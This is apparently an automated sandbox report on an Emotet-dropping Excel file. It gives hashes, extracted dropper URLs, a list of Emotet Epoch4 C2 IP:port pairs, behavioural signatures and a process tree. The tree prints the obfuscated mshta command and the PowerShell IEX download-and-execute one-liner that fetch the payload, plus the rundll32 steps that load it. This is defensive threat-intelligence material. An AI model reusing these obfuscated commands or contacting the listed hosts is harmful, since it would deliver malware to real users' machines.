Analysis

  • max time kernel
    122s
  • max time network
    140s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    18-01-2022 13:08

General

  • Target

    554def5c6fb4917a17fb5f951fc799471eb7520dd970a47d62ad565642b281d6.xls

  • Size

    128KB

  • MD5

    d0efc7a0b8673689b738de5d3d155e6d

  • SHA1

    66beb67d482a5de21d0a614abed203a4342158e8

  • SHA256

    554def5c6fb4917a17fb5f951fc799471eb7520dd970a47d62ad565642b281d6

  • SHA512

    26ae37022b3063230afe9ea64d459176f8256bd07152a04a25d7f729346a7a28c6a5ea3c313ef2ffdddc7a0e6bdb1dc686fabb25fad67e4b68a5b1fc6f99202a

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0xb907d607/cc.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://185.7.214.7/PP91.PNG

Extracted

Family

emotet

Botnet

Epoch4

C2

131.100.24.231:80

209.59.138.75:7080

103.8.26.103:8080

51.38.71.0:443

212.237.17.99:8080

79.172.212.216:8080

207.38.84.195:8080

104.168.155.129:8080

178.79.147.66:8080

46.55.222.11:443

103.8.26.102:8080

192.254.71.210:443

45.176.232.124:443

203.114.109.124:443

51.68.175.8:8080

58.227.42.236:80

45.142.114.231:8080

217.182.143.207:443

178.63.25.185:443

45.118.115.99:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\554def5c6fb4917a17fb5f951fc799471eb7520dd970a47d62ad565642b281d6.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1276
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/c^c.h^tm^l
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:900
      • C:\Windows\system32\mshta.exe
        mshta http://0xb907d607/cc.html
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:2952
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/PP91.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1324
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:736
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:2568
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:1048
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ojbfmbjvsjeas\zxyibfldmzye.eoe",iOAgwEvt
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2328
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Ojbfmbjvsjeas\zxyibfldmzye.eoe",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1880
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 2952 -s 1644
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2560

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1048-615-0x0000000004990000-0x00000000049B6000-memory.dmp

    Filesize

    152KB

  • memory/1048-607-0x0000000000810000-0x0000000000836000-memory.dmp

    Filesize

    152KB

  • memory/1048-603-0x0000000000270000-0x0000000000296000-memory.dmp

    Filesize

    152KB

  • memory/1048-609-0x0000000000880000-0x00000000008A6000-memory.dmp

    Filesize

    152KB

  • memory/1048-612-0x0000000004840000-0x0000000004866000-memory.dmp

    Filesize

    152KB

  • memory/1276-121-0x00007FFDEE7B0000-0x00007FFDEE7C0000-memory.dmp

    Filesize

    64KB

  • memory/1276-663-0x00007FFDEE7B0000-0x00007FFDEE7C0000-memory.dmp

    Filesize

    64KB

  • memory/1276-662-0x00007FFDEE7B0000-0x00007FFDEE7C0000-memory.dmp

    Filesize

    64KB

  • memory/1276-661-0x00007FFDEE7B0000-0x00007FFDEE7C0000-memory.dmp

    Filesize

    64KB

  • memory/1276-664-0x00007FFDEE7B0000-0x00007FFDEE7C0000-memory.dmp

    Filesize

    64KB

  • memory/1276-115-0x00007FFDEE7B0000-0x00007FFDEE7C0000-memory.dmp

    Filesize

    64KB

  • memory/1276-129-0x00007FFDEBBB0000-0x00007FFDEBBC0000-memory.dmp

    Filesize

    64KB

  • memory/1276-128-0x00007FFDEBBB0000-0x00007FFDEBBC0000-memory.dmp

    Filesize

    64KB

  • memory/1276-118-0x00007FFDEE7B0000-0x00007FFDEE7C0000-memory.dmp

    Filesize

    64KB

  • memory/1276-117-0x00007FFDEE7B0000-0x00007FFDEE7C0000-memory.dmp

    Filesize

    64KB

  • memory/1276-116-0x00007FFDEE7B0000-0x00007FFDEE7C0000-memory.dmp

    Filesize

    64KB

  • memory/1324-274-0x0000017463C30000-0x0000017463C52000-memory.dmp

    Filesize

    136KB

  • memory/1324-341-0x000001744BAC6000-0x000001744BAC8000-memory.dmp

    Filesize

    8KB

  • memory/1324-306-0x00000174643C0000-0x0000017464436000-memory.dmp

    Filesize

    472KB

  • memory/1324-295-0x0000017464300000-0x000001746433C000-memory.dmp

    Filesize

    240KB

  • memory/1324-280-0x000001744BAC3000-0x000001744BAC5000-memory.dmp

    Filesize

    8KB

  • memory/1324-279-0x000001744BAC0000-0x000001744BAC2000-memory.dmp

    Filesize

    8KB

  • memory/1880-617-0x0000000000490000-0x00000000004B6000-memory.dmp

    Filesize

    152KB

  • memory/1880-619-0x0000000000CD0000-0x0000000000CF6000-memory.dmp

    Filesize

    152KB

  • memory/2328-614-0x0000000003750000-0x0000000003776000-memory.dmp

    Filesize

    152KB

  • memory/2568-600-0x0000000004340000-0x0000000004366000-memory.dmp

    Filesize

    152KB